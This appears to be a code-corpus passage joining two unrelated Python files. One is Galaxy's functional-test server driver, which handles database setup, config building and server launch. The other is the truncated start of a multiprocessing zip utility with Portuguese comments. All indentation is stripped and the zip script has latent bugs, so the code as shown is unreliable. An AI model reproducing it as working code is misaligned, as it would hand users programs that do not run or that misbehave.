"""Create test directory for use by Galaxy server being setup for testing."""
galaxy_test_tmp_dir = os.environ.get('GALAXY_TEST_TMP_DIR', None)
if galaxy_test_tmp_dir is None:
galaxy_test_tmp_dir = tempfile.mkdtemp()
return galaxy_test_tmp_dir
def configure_environment():
"""Hack up environment for test cases."""
# no op remove if unused
if 'HTTP_ACCEPT_LANGUAGE' not in os.environ:
os.environ['HTTP_ACCEPT_LANGUAGE'] = DEFAULT_LOCALES
# Used by get_filename in tool shed's twilltestcase.
if "TOOL_SHED_TEST_FILE_DIR" not in os.environ:
os.environ["TOOL_SHED_TEST_FILE_DIR"] = TOOL_SHED_TEST_DATA
os.environ["GALAXY_TEST_ENVIRONMENT_CONFIGURED"] = "1"
def build_logger():
"""Build a logger for test driver script."""
return log
def ensure_test_file_dir_set():
"""Ensure GALAXY_TEST_FILE_DIR setup in environment for test data resolver.
Return first directory for backward compat.
"""
galaxy_test_file_dir = os.environ.get('GALAXY_TEST_FILE_DIR', GALAXY_TEST_FILE_DIR)
os.environ['GALAXY_TEST_FILE_DIR'] = galaxy_test_file_dir
first_test_file_dir = galaxy_test_file_dir.split(",")[0]
return first_test_file_dir
def setup_galaxy_config(
tmpdir,
use_test_file_dir=False,
default_install_db_merged=True,
default_tool_data_table_config_path=None,
default_shed_tool_data_table_config=None,
default_job_config_file=None,
enable_tool_shed_check=False,
default_tool_conf=None,
shed_tool_conf=None,
datatypes_conf=None,
update_integrated_tool_panel=False,
prefer_template_database=False,
log_format=None,
conda_auto_init=False,
conda_auto_install=False,
use_shared_connection_for_amqp=False,
):
"""Setup environment and build config for test Galaxy instance."""
# For certain docker operations this needs to be evaluated out - e.g. for cwltool.
tmpdir = os.path.realpath(tmpdir)
if not os.path.exists(tmpdir):
os.makedirs(tmpdir)
template_cache_path = tempfile.mkdtemp(prefix='compiled_templates_', dir=tmpdir)
new_file_path = tempfile.mkdtemp(prefix='new_files_path_', dir=tmpdir)
job_working_directory = tempfile.mkdtemp(prefix='job_working_directory_', dir=tmpdir)
if use_test_file_dir:
first_test_file_dir = ensure_test_file_dir_set()
if not os.path.isabs(first_test_file_dir):
first_test_file_dir = os.path.join(galaxy_root, first_test_file_dir)
library_import_dir = first_test_file_dir
import_dir = os.path.join(first_test_file_dir, 'users')
if os.path.exists(import_dir):
user_library_import_dir = import_dir
else:
user_library_import_dir = None
else:
user_library_import_dir = None
library_import_dir = None
job_config_file = os.environ.get('GALAXY_TEST_JOB_CONFIG_FILE', default_job_config_file)
tool_path = os.environ.get('GALAXY_TEST_TOOL_PATH', 'tools')
tool_data_table_config_path = _tool_data_table_config_path(default_tool_data_table_config_path)
default_data_manager_config = None
for data_manager_config in ['config/data_manager_conf.xml', 'data_manager_conf.xml']:
if os.path.exists(data_manager_config):
default_data_manager_config = data_manager_config
data_manager_config_file = 'test/functional/tools/sample_data_manager_conf.xml'
if default_data_manager_config is not None:
data_manager_config_file = f"{default_data_manager_config},{data_manager_config_file}"
master_api_key = get_master_api_key()
cleanup_job = 'never' if ("GALAXY_TEST_NO_CLEANUP" in os.environ or
"TOOL_SHED_TEST_NO_CLEANUP" in os.environ) else 'onsuccess'
# Data Manager testing temp path
# For storing Data Manager outputs and .loc files so that real ones don't get clobbered
galaxy_data_manager_data_path = tempfile.mkdtemp(prefix='data_manager_tool-data', dir=tmpdir)
tool_conf = os.environ.get('GALAXY_TEST_TOOL_CONF', default_tool_conf)
conda_auto_install = os.environ.get('GALAXY_TEST_CONDA_AUTO_INSTALL', conda_auto_install)
conda_auto_init = os.environ.get('GALAXY_TEST_CONDA_AUTO_INIT', conda_auto_init)
conda_prefix = os.environ.get('GALAXY_TEST_CONDA_PREFIX')
if tool_conf is None:
# As a fallback always at least allow upload.
tool_conf = FRAMEWORK_UPLOAD_TOOL_CONF
if shed_tool_conf is not None:
tool_conf = f"{tool_conf},{shed_tool_conf}"
# Resolve these paths w.r.t. galaxy root; otherwise galaxy's config system will resolve them w.r.t.
# their parent directories, as per schema.
data_manager_config_file = _resolve_relative_config_paths(data_manager_config_file)
tool_config_file = _resolve_relative_config_paths(tool_conf)
tool_data_table_config_path = _resolve_relative_config_paths(tool_data_table_config_path)
config = dict(
admin_users='test@bx.psu.edu',
allow_library_path_paste=True,
allow_user_creation=True,
allow_user_deletion=True,
api_allow_run_as='test@bx.psu.edu',
auto_configure_logging=logging_config_file is None,
check_migrate_tools=False,
chunk_upload_size=100,
conda_prefix=conda_prefix,
conda_auto_init=conda_auto_init,
conda_auto_install=conda_auto_install,
cleanup_job=cleanup_job,
retry_metadata_internally=False,
data_dir=tmpdir,
data_manager_config_file=data_manager_config_file,
enable_beta_tool_formats=True,
expose_dataset_path=True,
ftp_upload_purge=False,
galaxy_data_manager_data_path=galaxy_data_manager_data_path,
id_secret='changethisinproductiontoo',
job_config_file=job_config_file,
job_working_directory=job_working_directory,
library_import_dir=library_import_dir,
log_destination="stdout",
new_file_path=new_file_path,
override_tempdir=False,
master_api_key=master_api_key,
running_functional_tests=True,
template_cache_path=template_cache_path,
template_path='templates',
tool_config_file=tool_config_file,
tool_data_table_config_path=tool_data_table_config_path,
tool_parse_help=False,
tool_path=tool_path,
update_integrated_tool_panel=update_integrated_tool_panel,
use_tasked_jobs=True,
use_heartbeat=False,
user_library_import_dir=user_library_import_dir,
webhooks_dir=TEST_WEBHOOKS_DIR,
logging=LOGGING_CONFIG_DEFAULT,
monitor_thread_join_timeout=5,
object_store_store_by="uuid",
simplified_workflow_run_ui="off",
)
if default_shed_tool_data_table_config:
config["shed_tool_data_table_config"] = default_shed_tool_data_table_config
if not use_shared_connection_for_amqp:
config["amqp_internal_connection"] = "sqlalchemy+sqlite:///%s?isolation_level=IMMEDIATE" % os.path.join(tmpdir, "control.sqlite")
config.update(database_conf(tmpdir, prefer_template_database=prefer_template_database))
config.update(install_database_conf(tmpdir, default_merged=default_install_db_merged))
if asbool(os.environ.get("GALAXY_TEST_USE_HIERARCHICAL_OBJECT_STORE")):
object_store_config = os.path.join(tmpdir, "object_store_conf.yml")
with open(object_store_config, "w") as f:
contents = """
type: hierarchical
backends:
- id: files1
type: disk
weight: 1
files_dir: "${temp_directory}/files1"
extra_dirs:
- type: temp
path: "${temp_directory}/tmp1"
- type: job_work
path: "${temp_directory}/job_working_directory1"
- id: files2
type: disk
weight: 1
files_dir: "${temp_directory}/files2"
extra_dirs:
- type: temp
path: "${temp_directory}/tmp2"
- type: job_work
path: "${temp_directory}/job_working_directory2"
"""
contents_template = string.Template(contents)
expanded_contents = contents_template.safe_substitute(temp_directory=tmpdir)
f.write(expanded_contents)
config["object_store_config_file"] = object_store_config
if datatypes_conf is not None:
config['datatypes_config_file'] = datatypes_conf
if enable_tool_shed_check:
config["enable_tool_shed_check"] = enable_tool_shed_check
config["hours_between_check"] = 0.001
tool_dependency_dir = os.environ.get('GALAXY_TOOL_DEPENDENCY_DIR')
if tool_dependency_dir:
config["tool_dependency_dir"] = tool_dependency_dir
# Used by shed's twill dependency stuff
# TODO: read from Galaxy's config API.
os.environ["GALAXY_TEST_TOOL_DEPENDENCY_DIR"] = tool_dependency_dir or os.path.join(tmpdir, 'dependencies')
return config
def _resolve_relative_config_paths(config_option):
# If option is not None, split into paths, resolve each w.r.t. root, then rebuild as csv string.
if config_option is not None:
resolved = []
for path in config_option.split(','):
resolved.append(os.path.join(galaxy_root, path.strip()))
return ','.join(resolved)
def _tool_data_table_config_path(default_tool_data_table_config_path=None):
tool_data_table_config_path = os.environ.get('GALAXY_TEST_TOOL_DATA_TABLE_CONF', default_tool_data_table_config_path)
if tool_data_table_config_path is None:
# ... otherwise find whatever Galaxy would use as the default and
# the sample data for functional tests to that.
default_tool_data_config = 'lib/galaxy/config/sample/tool_data_table_conf.xml.sample'
for tool_data_config in ['config/tool_data_table_conf.xml', 'tool_data_table_conf.xml']:
if os.path.exists(tool_data_config):
default_tool_data_config = tool_data_config
test_tool_data_config = 'test/functional/tool-data/sample_tool_data_tables.xml'
tool_data_table_config_path = f'{default_tool_data_config},{test_tool_data_config}'
return tool_data_table_config_path
def nose_config_and_run(argv=None, env=None, ignore_files=None, plugins=None):
"""Setup a nose context and run tests.
Tests are specified by argv (defaulting to sys.argv).
"""
if env is None:
env = os.environ
if ignore_files is None:
ignore_files = []
if plugins is None:
plugins = nose.plugins.manager.DefaultPluginManager()
if argv is None:
argv = sys.argv
test_config = nose.config.Config(
env=os.environ,
ignoreFiles=ignore_files,
plugins=plugins,
)
# Add custom plugin to produce JSON data used by planemo.
test_config.plugins.addPlugin(StructuredTestDataPlugin())
test_config.configure(argv)
result = run(test_config)
success = result.wasSuccessful()
return success
def copy_database_template(source, db_path):
"""Copy a 'clean' sqlite template database.
From file or URL to specified path for sqlite database.
"""
db_path_dir = os.path.dirname(db_path)
if not os.path.exists(db_path_dir):
os.makedirs(db_path_dir)
if os.path.exists(source):
shutil.copy(source, db_path)
assert os.path.exists(db_path)
elif source.lower().startswith(("http://", "https://", "ftp://")):
try:
download_to_file(source, db_path)
except Exception as e:
# We log the exception but don't fail startup, since we can
# do all migration steps instead of downloading a template.
log.exception(e)
else:
raise Exception("Failed to copy database template from source %s" % source)
def database_conf(db_path, prefix="GALAXY", prefer_template_database=False):
"""Find (and populate if needed) Galaxy database connection."""
database_auto_migrate = False
check_migrate_databases = True
dburi_var = "%s_TEST_DBURI" % prefix
template_name = None
if dburi_var in os.environ:
database_connection = os.environ[dburi_var]
# only template if postgres - not mysql or sqlite
do_template = prefer_template_database and database_connection.startswith("p")
if do_template:
database_template_parsed = urlparse(database_connection)
template_name = database_template_parsed.path[1:] # drop / from /galaxy
actual_db = "gxtest" + ''.join(random.choice(string.ascii_uppercase) for _ in range(10))
actual_database_parsed = database_template_parsed._replace(path="/%s" % actual_db)
database_connection = actual_database_parsed.geturl()
if not database_exists(database_connection):
# We pass by migrations and instantiate the current table
create_database(database_connection)
mapping.init('/tmp', database_connection, create_tables=True, map_install_models=True)
toolshed_mapping.init(database_connection, create_tables=True)
check_migrate_databases = False
else:
default_db_filename = "%s.sqlite" % prefix.lower()
template_var = "%s_TEST_DB_TEMPLATE" % prefix
db_path = os.path.join(db_path, default_db_filename)
if template_var in os.environ:
# Middle ground between recreating a completely new
# database and pointing at existing database with
# GALAXY_TEST_DBURI. The former requires a lot of setup
# time, the latter results in test failures in certain
# cases (namely tool shed tests expecting clean database).
copy_database_template(os.environ[template_var], db_path)
database_auto_migrate = True
database_connection = 'sqlite:///%s' % db_path
config = {
"check_migrate_databases": check_migrate_databases,
"database_connection": database_connection,
"database_auto_migrate": database_auto_migrate
}
if not database_connection.startswith("sqlite://"):
config["database_engine_option_max_overflow"] = "20"
config["database_engine_option_pool_size"] = "10"
if template_name:
config["database_template"] = template_name
return config
def install_database_conf(db_path, default_merged=False):
if 'GALAXY_TEST_INSTALL_DBURI' in os.environ:
install_galaxy_database_connection = os.environ['GALAXY_TEST_INSTALL_DBURI']
elif asbool(os.environ.get('GALAXY_TEST_INSTALL_DB_MERGED', default_merged)):
install_galaxy_database_connection = None
else:
install_galaxy_db_path = os.path.join(db_path, 'install.sqlite')
install_galaxy_database_connection = 'sqlite:///%s' % install_galaxy_db_path
conf = {}
if install_galaxy_database_connection is not None:
conf["install_database_connection"] = install_galaxy_database_connection
return conf
def database_files_path(test_tmpdir, prefix="GALAXY"):
"""Create a mock database/ directory like in GALAXY_ROOT.
Use prefix to default this if TOOL_SHED_TEST_DBPATH or
GALAXY_TEST_DBPATH is set in the environment.
"""
environ_var = "%s_TEST_DBPATH" % prefix
if environ_var in os.environ:
db_path = os.environ[environ_var]
else:
tempdir = tempfile.mkdtemp(dir=test_tmpdir)
db_path = os.path.join(tempdir, 'database')
return db_path
def _get_static_settings():
"""Configuration required for Galaxy static middleware.
Returns dictionary of the settings necessary for a galaxy App
to be wrapped in the static middleware.
This mainly consists of the filesystem locations of url-mapped
static resources.
"""
static_dir = os.path.join(galaxy_root, "static")
# TODO: these should be copied from config/galaxy.ini
return dict(
static_enabled=True,
static_cache_time=360,
static_dir=static_dir,
static_images_dir=os.path.join(static_dir, 'images', ''),
static_favicon_dir=os.path.join(static_dir, 'favicon.ico'),
static_scripts_dir=os.path.join(static_dir, 'scripts', ''),
static_style_dir=os.path.join(static_dir, 'style'),
static_robots_txt=os.path.join(static_dir, 'robots.txt'),
)
def get_webapp_global_conf():
"""Get the global_conf dictionary sent to ``app_factory``."""
# (was originally sent 'dict()') - nothing here for now except static settings
global_conf = dict()
global_conf.update(_get_static_settings())
return global_conf
def wait_for_http_server(host, port, sleep_amount=0.1, sleep_tries=150):
"""Wait for an HTTP server to boot up."""
# Test if the server is up
for _ in range(sleep_tries):
# directly test the app, not the proxy
conn = http.client.HTTPConnection(host, port)
try:
conn.request("GET", "/")
response = conn.getresponse()
if response.status == 200:
break
except OSError as e:
if e.errno not in [61, 111]:
raise
time.sleep(sleep_amount)
else:
template = "Test HTTP server on host %s and port %s did not return '200 OK' after 10 tries"
message = template % (host, port)
raise Exception(message)
def attempt_ports(port):
if port is not None:
yield port
raise Exception("An existing process seems bound to specified test server port [%s]" % port)
else:
random.seed()
for _ in range(0, 9):
port = str(random.randint(8000, 10000))
yield port
raise Exception("Unable to open a port between {} and {} to start Galaxy server".format(8000, 10000))
def serve_webapp(webapp, port=None, host=None):
"""Serve the webapp on a recommend port or a free one.
Return the port the webapp is running on.
"""
server = None
for port in attempt_ports(port):
try:
server = httpserver.serve(webapp, host=host, port=port, start_loop=False)
break
except OSError as e:
if e.errno == 98:
continue
raise
t = threading.Thread(target=server.serve_forever)
t.start()
return server, port
def cleanup_directory(tempdir):
"""Clean up temporary files used by test unless GALAXY_TEST_NO_CLEANUP is set.
Also respect TOOL_SHED_TEST_NO_CLEANUP for legacy reasons.
"""
skip_cleanup = "GALAXY_TEST_NO_CLEANUP" in os.environ or "TOOL_SHED_TEST_NO_CLEANUP" in os.environ
if skip_cleanup:
log.info("GALAXY_TEST_NO_CLEANUP is on. Temporary files in %s" % tempdir)
return
try:
if os.path.exists(tempdir) and not skip_cleanup:
shutil.rmtree(tempdir)
except Exception:
pass
def setup_shed_tools_for_test(app, tmpdir, testing_migrated_tools, testing_installed_tools):
"""Modify Galaxy app's toolbox for migrated or installed tool tests."""
if testing_installed_tools:
# TODO: Do this without modifying app - that is a pretty violation
# of Galaxy's abstraction - we shouldn't require app at all let alone
# be modifying it.
tool_configs = app.config.tool_configs
# Eliminate the migrated_tool_panel_config from the app's tool_configs, append the list of installed_tool_panel_configs,
# and reload the app's toolbox.
relative_migrated_tool_panel_config = os.path.join(app.config.root, MIGRATED_TOOL_PANEL_CONFIG)
if relative_migrated_tool_panel_config in tool_configs:
tool_configs.remove(relative_migrated_tool_panel_config)
for installed_tool_panel_config in INSTALLED_TOOL_PANEL_CONFIGS:
tool_configs.append(installed_tool_panel_config)
from galaxy import tools # delay import because this brings in so many modules for small tests # noqa: E402
app.toolbox = tools.ToolBox(tool_configs, app.config.tool_path, app)
def build_galaxy_app(simple_kwargs):
"""Build a Galaxy app object from a simple keyword arguments.
Construct paste style complex dictionary and use load_app_properties so
Galaxy override variables are respected. Also setup "global" references
to sqlalchemy database context for Galaxy and install databases.
"""
log.info("Galaxy database connection: %s", simple_kwargs["database_connection"])
simple_kwargs['global_conf'] = get_webapp_global_conf()
simple_kwargs['global_conf']['__file__'] = "lib/galaxy/config/sample/galaxy.yml.sample"
simple_kwargs = load_app_properties(
kwds=simple_kwargs
)
# Build the Universe Application
app = GalaxyUniverseApplication(**simple_kwargs)
log.info("Embedded Galaxy application started")
global galaxy_context
global install_context
galaxy_context = app.model.context
install_context = app.install_model.context
# Toolbox indexing happens via the work queue out of band recently, and,
# beyond potentially running async after tests execute doesn't execute
# without building a uwsgi app (app.is_webapp = False for this test kit).
# We need to ensure to build an index for the test galaxy app -- this is
# pretty fast with the limited toolset
app.reindex_tool_search()
return app
def build_shed_app(simple_kwargs):
"""Build a Galaxy app object from a simple keyword arguments.
Construct paste style complex dictionary. Also setup "global" reference
to sqlalchemy database context for tool shed database.
"""
log.info("Tool shed database connection: %s", simple_kwargs["database_connection"])
# TODO: Simplify global_conf to match Galaxy above...
simple_kwargs['__file__'] = 'tool_shed_wsgi.yml.sample'
simple_kwargs['global_conf'] = get_webapp_global_conf()
app = ToolshedUniverseApplication(**simple_kwargs)
log.info("Embedded Toolshed application started")
global tool_shed_context
tool_shed_context = app.model.context
return app
def explicitly_configured_host_and_port(prefix, config_object):
host_env_key = "%s_TEST_HOST" % prefix
port_env_key = "%s_TEST_PORT" % prefix
port_random_env_key = "%s_TEST_PORT_RANDOM" % prefix
default_web_host = getattr(config_object, "default_web_host", DEFAULT_WEB_HOST)
host = os.environ.get(host_env_key, default_web_host)
if os.environ.get(port_random_env_key, None) is not None:
# Ignore the port environment variable, it wasn't explictly configured.
port = None
else:
port = os.environ.get(port_env_key, None)
# If an explicit port wasn't assigned for this test or test case, set this
# environment variable so we know it is random. We can then randomly re-assign
# for new tests.
if port is None:
os.environ["GALAXY_TEST_PORT_RANDOM"] = "1"
return host, port
def set_and_wait_for_http_target(prefix, host, port, sleep_amount=0.1, sleep_tries=150):
host_env_key = "%s_TEST_HOST" % prefix
port_env_key = "%s_TEST_PORT" % prefix
os.environ[host_env_key] = host
os.environ[port_env_key] = port
wait_for_http_server(host, port, sleep_amount=sleep_amount, sleep_tries=sleep_tries)
class ServerWrapper:
def __init__(self, name, host, port):
self.name = name
self.host = host
self.port = port
@property
def app(self):
raise NotImplementedError("Test can be run against target - requires a Galaxy app object.")
def stop(self):
raise NotImplementedError()
class PasteServerWrapper(ServerWrapper):
def __init__(self, app, server, name, host, port):
super().__init__(name, host, port)
self._app = app
self._server = server
@property
def app(self):
return self._app
def stop(self):
if self._server is not None:
log.info("Shutting down embedded %s web server" % self.name)
self._server.server_close()
log.info("Embedded web server %s stopped" % self.name)
if self._app is not None:
log.info("Stopping application %s" % self.name)
self._app.shutdown()
log.info("Application %s stopped." % self.name)
class UwsgiServerWrapper(ServerWrapper):
def __init__(self, p, name, host, port):
super().__init__(name, host, port)
self._p = p
self._r = None
self._t = threading.Thread(target=self.wait)
self._t.start()
def __del__(self):
self._t.join()
def wait(self):
self._r = self._p.wait()
def stop(self):
try:
os.killpg(os.getpgid(self._p.pid), signal.SIGTERM)
except Exception:
pass
time.sleep(.1)
try:
os.killpg(os.getpgid(self._p.pid), signal.SIGKILL)
except Exception:
pass
self._t.join()
def launch_uwsgi(kwargs, tempdir, prefix=DEFAULT_CONFIG_PREFIX, config_object=None):
name = prefix.lower()
host, port = explicitly_configured_host_and_port(prefix, config_object)
config = {}
config["galaxy"] = kwargs.copy()
enable_realtime_mapping = getattr(config_object, "enable_realtime_mapping", False)
if enable_realtime_mapping:
interactive_tool_defaults = {
"interactivetools_prefix": "interactivetool",
"interactivetools_map": os.path.join(tempdir, "interactivetools_map.sqlite"),
"interactivetools_enable": True
}
for key, value in interactive_tool_defaults.items():
if key not in config["galaxy"]:
config["galaxy"][key] = value
yaml_config_path = os.path.join(tempdir, "galaxy.yml")
with open(yaml_config_path, "w") as f:
yaml.dump(config, f)
if enable_realtime_mapping:
# Avoid YAML.dump configuration since uwsgi doesn't like real YAML :( -
# though maybe it would work?
with open(yaml_config_path) as f:
old_contents = f.read()
with open(yaml_config_path, "w") as f:
test_port = str(port) if port else r"[0-9]+"
test_host = re.escape(host) if host else "localhost"
uwsgi_section = REALTIME_PROXY_TEMPLATE.safe_substitute(test_host=test_host, test_port=test_port, tempdir=tempdir)
f.write(uwsgi_section)
f.write(old_contents)
def attempt_port_bind(port):
uwsgi_command = [
"uwsgi",
"--http",
f"{host}:{port}",
"--yaml",
yaml_config_path,
"--module",
"galaxy.webapps.galaxy.buildapp:uwsgi_app_factory()",
"--enable-threads",
"--die-on-term",
]
for p in sys.path:
uwsgi_command.append('--pythonpath')
uwsgi_command.append(p)
handle_uwsgi_cli_command = getattr(
config_object, "handle_uwsgi_cli_command", None
)
if handle_uwsgi_cli_command is not None:
handle_uwsgi_cli_command(uwsgi_command)
# we don't want to quote every argument but we don't want to print unquoted ones either, so do this
log.info("Starting uwsgi with command line: %s", ' '.join(shlex.quote(x) for x in uwsgi_command))
p = subprocess.Popen(
uwsgi_command,
cwd=galaxy_root,
preexec_fn=os.setsid,
)
return UwsgiServerWrapper(
p, name, host, port
)
for port in attempt_ports(port):
server_wrapper = attempt_port_bind(port)
try:
set_and_wait_for_http_target(prefix, host, port, sleep_tries=50)
log.info(f"Test-managed uwsgi web server for {name} started at {host}:{port}")
return server_wrapper
except Exception:
server_wrapper.stop()
def launch_server(app, webapp_factory, kwargs, prefix=DEFAULT_CONFIG_PREFIX, config_object=None):
"""Launch a web server for a given app using supplied factory.
Consistently read either GALAXY_TEST_HOST and GALAXY_TEST_PORT or
TOOL_SHED_TEST_HOST and TOOL_SHED_TEST_PORT and ensure these are
all set after this method has been called.
"""
name = prefix.lower()
host, port = explicitly_configured_host_and_port(prefix, config_object)
webapp = webapp_factory(
kwargs['global_conf'],
app=app,
use_translogger=False,
static_enabled=True,
register_shutdown_at_exit=False
)
server, port = serve_webapp(
webapp,
host=host, port=port
)
set_and_wait_for_http_target(prefix, host, port)
log.info(f"Embedded paste web server for {name} started at {host}:{port}")
return PasteServerWrapper(
app, server, name, host, port
)
class TestDriver:
"""Responsible for the life-cycle of a Galaxy-style functional test.
Sets up servers, configures tests, runs nose, and tears things
down. This is somewhat like a Python TestCase - but different
because it is meant to provide a main() endpoint.
"""
def __init__(self):
"""Setup tracked resources."""
self.server_wrappers = []
self.temp_directories = []
def setup(self):
"""Called before tests are built."""
def build_tests(self):
"""After environment is setup, setup nose tests."""
def tear_down(self):
"""Cleanup resources tracked by this object."""
self.stop_servers()
for temp_directory in self.temp_directories:
cleanup_directory(temp_directory)
def stop_servers(self):
for server_wrapper in self.server_wrappers:
server_wrapper.stop()
self.server_wrappers = []
def mkdtemp(self):
"""Return a temp directory that is properly cleaned up or not based on the config."""
temp_directory = tempfile.mkdtemp()
self.temp_directories.append(temp_directory)
return temp_directory
def run(self):
"""Driver whole test.
Setup environment, build tests (if needed), run test,
and finally cleanup resources.
"""
configure_environment()
self.setup()
self.build_tests()
try:
success = nose_config_and_run()
return 0 if success else 1
except Exception as e:
log.info("Failure running tests")
raise e
finally:
log.info("Shutting down")
self.tear_down()
class GalaxyTestDriver(TestDriver):
"""Instantial a Galaxy-style nose TestDriver for testing Galaxy."""
testing_shed_tools = False
def _configure(self, config_object=None):
"""Setup various variables used to launch a Galaxy server."""
config_object = self._ensure_config_object(config_object)
self.external_galaxy = os.environ.get('GALAXY_TEST_EXTERNAL', None)
# Allow a particular test to force uwsgi or any test to use uwsgi with
# the GALAXY_TEST_UWSGI environment variable.
use_uwsgi = os.environ.get('GALAXY_TEST_UWSGI', None)
if not use_uwsgi:
if getattr(config_object, "require_uwsgi", None):
use_uwsgi = True
self.use_uwsgi = use_uwsgi
# Allow controlling the log format
log_format = os.environ.get('GALAXY_TEST_LOG_FORMAT', None)
if not log_format and use_uwsgi:
log_format = "%(name)s %(levelname)-5.5s %(asctime)s " \
"[p:%(process)s,w:%(worker_id)s,m:%(mule_id)s] " \
"[%(threadName)s] %(message)s"
self.log_format = log_format
self.galaxy_test_tmp_dir = get_galaxy_test_tmp_dir()
self.temp_directories.append(self.galaxy_test_tmp_dir)
self.testing_shed_tools = getattr(config_object, "testing_shed_tools", False)
if getattr(config_object, "framework_tool_and_types", False):
default_tool_conf = FRAMEWORK_SAMPLE_TOOLS_CONF
datatypes_conf_override = FRAMEWORK_DATATYPES_CONF
else:
default_tool_conf = getattr(config_object, "default_tool_conf", None)
datatypes_conf_override = getattr(config_object, "datatypes_conf_override", None)
self.default_tool_conf = default_tool_conf
self.datatypes_conf_override = datatypes_conf_override
def setup(self, config_object=None):
"""Setup a Galaxy server for functional test (if needed).
Configuration options can be specified as attributes on the supplied
```config_object``` (defaults to self).
"""
self._saved_galaxy_config = None
self._configure(config_object)
self._register_and_run_servers(config_object)
def restart(self, config_object=None, handle_config=None):
self.stop_servers()
self._register_and_run_servers(config_object, handle_config=handle_config)
def _register_and_run_servers(self, config_object=None, handle_config=None):
config_object = self._ensure_config_object(config_object)
self.app = None
if self.external_galaxy is None:
if self._saved_galaxy_config is not None:
galaxy_config = self._saved_galaxy_config
else:
tempdir = tempfile.mkdtemp(dir=self.galaxy_test_tmp_dir)
# Configure the database path.
galaxy_db_path = database_files_path(tempdir)
# Allow config object to specify a config dict or a method to produce
# one - other just read the properties above and use the default
# implementation from this file.
galaxy_config = getattr(config_object, "galaxy_config", None)
if callable(galaxy_config):
galaxy_config = galaxy_config()
if galaxy_config is None:
setup_galaxy_config_kwds = dict(
use_test_file_dir=not self.testing_shed_tools,
default_install_db_merged=True,
default_tool_conf=self.default_tool_conf,
datatypes_conf=self.datatypes_conf_override,
prefer_template_database=getattr(config_object, "prefer_template_database", False),
log_format=self.log_format,
conda_auto_init=getattr(config_object, "conda_auto_init", False),
conda_auto_install=getattr(config_object, "conda_auto_install", False),
use_shared_connection_for_amqp=getattr(config_object, "use_shared_connection_for_amqp", False)
)
galaxy_config = setup_galaxy_config(
galaxy_db_path,
**setup_galaxy_config_kwds
)
isolate_galaxy_config = getattr(config_object, "isolate_galaxy_config", False)
if isolate_galaxy_config:
galaxy_config["config_dir"] = tempdir
self._saved_galaxy_config = galaxy_config
if galaxy_config is not None:
handle_galaxy_config_kwds = handle_config or getattr(
config_object, "handle_galaxy_config_kwds", None
)
if handle_galaxy_config_kwds is not None:
handle_galaxy_config_kwds(galaxy_config)
if self.use_uwsgi:
server_wrapper = launch_uwsgi(
galaxy_config,
tempdir=tempdir,
config_object=config_object,
)
else:
# ---- Build Application --------------------------------------------------
self.app = build_galaxy_app(galaxy_config)
server_wrapper = launch_server(
self.app,
buildapp.app_factory,
galaxy_config,
config_object=config_object,
)
log.info(f"Functional tests will be run against external Galaxy server {server_wrapper.host}:{server_wrapper.port}")
self.server_wrappers.append(server_wrapper)
else:
log.info("Functional tests will be run against test managed Galaxy server %s" % self.external_galaxy)
# Ensure test file directory setup even though galaxy config isn't built.
ensure_test_file_dir_set()
def _ensure_config_object(self, config_object):
if config_object is None:
config_object = self
return config_object
def setup_shed_tools(self, testing_migrated_tools=False, testing_installed_tools=True):
setup_shed_tools_for_test(
self.app,
self.galaxy_test_tmp_dir,
testing_migrated_tools,
testing_installed_tools
)
def build_tool_tests(self, testing_shed_tools=None, return_test_classes=False):
if self.app is None:
return
if testing_shed_tools is None:
testing_shed_tools = getattr(self, "testing_shed_tools", False)
# We must make sure that functional.test_toolbox is always imported after
# database_contexts.galaxy_content is set (which occurs in this method above).
# If functional.test_toolbox is imported before database_contexts.galaxy_content
# is set, sa_session will be None in all methods that use it.
import functional.test_toolbox
functional.test_toolbox.toolbox = self.app.toolbox
# When testing data managers, do not test toolbox.
test_classes = functional.test_toolbox.build_tests(
app=self.app,
testing_shed_tools=testing_shed_tools,
master_api_key=get_master_api_key(),
user_api_key=get_user_api_key(),
)
if return_test_classes:
return test_classes
return functional.test_toolbox
def run_tool_test(self, tool_id, index=0, resource_parameters=None, **kwd):
if resource_parameters is None:
resource_parameters = {}
host, port, url = target_url_parts()
galaxy_interactor_kwds = {
"galaxy_url": url,
"master_api_key": get_master_api_key(),
"api_key": get_user_api_key(),
"keep_outputs_dir": None,
}
galaxy_interactor = GalaxyInteractorApi(**galaxy_interactor_kwds)
verify_tool(
tool_id=tool_id,
test_index=index,
galaxy_interactor=galaxy_interactor,
resource_parameters=resource_parameters,
**kwd
)
def drive_test(test_driver_class):
"""Instantiate driver class, run, and exit appropriately."""
test_driver = test_driver_class()
sys.exit(test_driver.run())
__all__ = (
"copy_database_template",
"build_logger",
"drive_test",
"FRAMEWORK_UPLOAD_TOOL_CONF",
"FRAMEWORK_SAMPLE_TOOLS_CONF",
"FRAMEWORK_DATATYPES_CONF",
"database_conf",
"get_webapp_global_conf",
"nose_config_and_run",
"setup_galaxy_config",
"TestDriver",
"wait_for_http_server",
)
|
pzip.py
|
#!/usr/bin/python
# -*- coding:utf-8 -*-
import argparse
from zipfile import ZipFile
from multiprocessing import Process, Value, Semaphore, Array
from ctypes import c_char_p
import signal
import time
import os
import sys
import datetime
import struct
totalFiles = Value('i', 0)
totalFilesSem = Semaphore(1)
errorChecker = Value('i', 0)
volume = Value("i", 0)
pointer = Value("i", 0)
sem = Semaphore(1)
def handle_files(files, t, f, names, times, sizes, pid):
"""
Faz zip e unzip de ficheiros.
Requires: files é uma lista de ficheiros, t é um boolean, f é uma string ou None, names, times, sizes e pid
sao None ou Array()
Ensures: Zip/unzip de ficheiros.
"""
while pointer.value < len(files) and ((errorChecker.value == 0 and t) or not t) and errorChecker.value < 2:
# Se o modo for t so pode avançar se errorChecker for 0 (nao ha erro) e ainda houver ficheiros
# Se o modo nao for t entao pode avancar sem restricoes enquanto houver ficheiros
time1 = time.time()
sem.acquire() # Mutex para garantir que um ficheiro so e' zipado por um processo
iterator = pointer.value
pointer.value += 1
sem.release()
if iterator < len(files): # Iterator e' o ficheiro que deve ser utilizado pelo processo
File = files[iterator]
if os.path.isfile(File): # Ver se o ficheiro existe
if mode == 'c':
with ZipFile(File + '.zip', 'w') as zipfile:
zipfile.write(File) # Zip
else:
with ZipFile(File, 'r') as zipfile:
zipfile.extractall('.') # Unzip
totalFilesSem.acquire()
totalFiles.value += 1
file_size = (os.path.getsize(File + '.zip') if mode == 'c' else os.path.getsize(File.strip(".zip")))
volume.value += file_size
totalFilesSem.release()
# Por informacoes do processo e ficheiro para os arrays para serem escritos em ficheiro binario
if f is not None:
names[iterator] = File
times[iterator] = time.time() - time1
sizes[iterator] = file_size
